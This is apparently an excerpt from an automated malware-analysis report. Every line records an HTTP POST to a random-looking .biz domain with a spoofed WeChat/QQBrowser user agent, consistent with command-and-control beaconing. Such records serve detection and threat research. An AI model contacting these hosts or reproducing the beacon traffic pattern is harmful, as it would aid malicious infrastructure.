Source: global traffic HTTP traffic detected: POST /fqwxf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /wxdopk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ifsivywgpp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /kui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /qlejchqklyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fvlqmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /jmyxny HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /fshqbiv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tipcpxgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /qkmbmbtlinurxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mhnfavogqkp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /omaxykiwlg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mggqfmrkiurp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /elpkfqto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /mvjuawquor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xqvmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /sltbypkjutmqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /risgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fvahgnbvglin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /xwmumuqawghep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /anxrplnvdvpxn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /iytkitpluk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /cngo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /uwugf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /bvxo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /torfbleb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /iqacwcupavovv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /gknotpflubkt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /njk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ljnnvokac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /heowijklptfa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /jt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gerofbpnhxbnel HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /negfyndqat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /twv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /sfduvqthq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /oitokksbsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /rmu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ajqmmfcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /txgdoagkkmvqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /wmyvrothcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dqpygue HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ubrpiugbci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qjkfpfdycqfln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /vauoordpmpgaykv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vtk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /jsmhknoucgib HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /udyyttdfi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rvwkmk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /yfqsba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /emfmvfownawowh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dgxlfefuhlec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /txfroxnfrj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ptd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /wm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /ym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /fuqbdfcow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic HTTP traffic detected: POST /binfxyplqyoumy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
